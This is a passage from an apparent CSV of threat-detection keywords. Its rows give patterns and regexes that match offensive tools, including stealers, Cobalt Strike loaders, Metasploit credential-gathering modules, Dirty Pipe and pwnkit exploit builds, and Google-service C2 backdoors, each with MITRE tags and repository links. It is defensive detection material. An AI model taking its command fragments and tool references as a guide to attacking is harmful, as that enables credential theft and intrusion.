"*G37UHQFr13ND5(*",".{0,1000}G37UHQFr13ND5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*G37W3851735(*",".{0,1000}G37W3851735\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*g3tsyst3m/undertheradar*",".{0,1000}g3tsyst3m\/undertheradar.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass 
techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*G47H3rZ1P5(*",".{0,1000}G47H3rZ1P5\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*gabriellandau/PPLFault*",".{0,1000}gabriellandau\/PPLFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*GadgetToJScript.csproj*",".{0,1000}GadgetToJScript\.csproj.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*GadgetToJScript.exe -a *",".{0,1000}GadgetToJScript\.exe\s\-a\s.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*GadgetToJScript.sln*",".{0,1000}GadgetToJScript\.sln.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*GadgetToJScript-master*",".{0,1000}GadgetToJScript\-master.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","9","827","154","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" 
"*Gality369/CS-Loader*",".{0,1000}Gality369\/CS\-Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*GateTrampolin.asm*",".{0,1000}GateTrampolin\.asm.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","260","42","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*gateway-finder*",".{0,1000}gateway\-finder.{0,1000}","offensive_tool_keyword","gateway-finder-imp","This is an improved version of original Gateway-finder. 
New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.","T1016 - T1049 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Data Exfiltration","https://github.com/whitel1st/gateway-finder-imp","1","0","N/A","N/A","1","60","7","2024-01-28T17:04:10Z","2018-04-18T12:43:11Z" "*gather/credentials/rdc_manager_creds*",".{0,1000}gather\/credentials\/rdc_manager_creds.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/credentials/teamviewer_passwords*",".{0,1000}gather\/credentials\/teamviewer_passwords.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/credentials/windows_autologin*",".{0,1000}gather\/credentials\/windows_autologin.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_bitlocker*",".{0,1000}gather\/enum_ad_bitlocker.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation 
tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_computers*",".{0,1000}gather\/enum_ad_computers.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_groups*",".{0,1000}gather\/enum_ad_groups.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_managedby_groups*",".{0,1000}gather\/enum_ad_managedby_groups.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_to_wordlist*",".{0,1000}gather\/enum_ad_to_wordlist.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_ad_user_comments*",".{0,1000}gather\/enum_ad_user_comments.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" 
"*gather/enum_logged_on_users*",".{0,1000}gather\/enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/enum_putty_saved_sessions*",".{0,1000}gather\/enum_putty_saved_sessions.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","0","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*gather/keylogger*",".{0,1000}gather\/keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*gather/ldap_query*",".{0,1000}gather\/ldap_query.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*gather/peass.rb*",".{0,1000}gather\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*gather/user_hunter*",".{0,1000}gather\/user_hunter.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*gatherer/gatherer.py*",".{0,1000}gatherer\/gatherer\.py.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. 
store it in a SQL database and show you nice graphs on how your domain objects interact with each other and how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passwords/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","546","89","2024-03-21T15:22:56Z","2019-03-27T18:36:41Z" "*gato * attack*",".{0,1000}gato\s.{0,1000}\sattack.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*gato * enumerate*",".{0,1000}gato\s.{0,1000}\senumerate.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*gato * --http-proxy*",".{0,1000}gato\s.{0,1000}\s\-\-http\-proxy.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" "*gato * --socks-proxy*",".{0,1000}gato\s.{0,1000}\s\-\-socks\-proxy.{0,1000}","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","5","446","43","2024-04-26T17:00:08Z","2023-01-06T15:43:27Z" 
"*gc2-sheet.go*",".{0,1000}gc2\-sheet\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*GC2-sheet/cmd*",".{0,1000}GC2\-sheet\/cmd.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*gcat*implant.py*",".{0,1000}gcat.{0,1000}implant\.py.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*gcat.is.the.shit@gmail.com*",".{0,1000}gcat\.is\.the\.shit\@gmail\.com.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*gcc cve_2022_0847.c -o exploit*",".{0,1000}gcc\scve_2022_0847\.c\s\-o\sexploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","22","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" "*gcc dirtypipez.c*",".{0,1000}gcc\sdirtypipez\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*gconv-modules*",".{0,1000}gconv\-modules.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","1","96","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" "*gcp_functionalc2.profile*",".{0,1000}gcp_functionalc2\.profile.{0,1000}","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","64","16","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*GCPBucketBrute*",".{0,1000}GCPBucketBrute.{0,1000}","offensive_tool_keyword","GCPBucketBrute","A script to enumerate Google Storage buckets. determine what access you have to them. 
and determine if they can be privilege escalated","T1083 - T1553 - T1210 - T1213","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs/GCPBucketBrute","1","0","N/A","N/A","5","447","85","2023-05-26T19:11:42Z","2019-02-26T03:56:22Z" "*GCR - Google Calendar RAT*",".{0,1000}GCR\s\-\sGoogle\sCalendar\sRAT.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*GCR-Google-Calendar-RAT*",".{0,1000}GCR\-Google\-Calendar\-RAT.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","203","37","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z" "*geacon*/cmd/*",".{0,1000}geacon.{0,1000}\/cmd\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*geli2john.py*",".{0,1000}geli2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*gem 'evil-proxy'*",".{0,1000}gem\s\'evil\-proxy\'.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*gemailhack.py*",".{0,1000}gemailhack\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","10","929","368","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z" "*gen -f py bind --port*",".{0,1000}gen\s\-f\spy\sbind\s\-\-port.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*gen -f py_oneliner connect *",".{0,1000}gen\s\-f\spy_oneliner\sconnect\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*genCrossC2 *",".{0,1000}genCrossC2\s.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*genCrossC2.*",".{0,1000}genCrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*genCrossC2.Win.exe*",".{0,1000}genCrossC2\.Win\.exe.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*Generalrecon -noninteractive*",".{0,1000}Generalrecon\s\-noninteractive.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*generate beacon --mtls *",".{0,1000}generate\sbeacon\s\-\-mtls\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - 
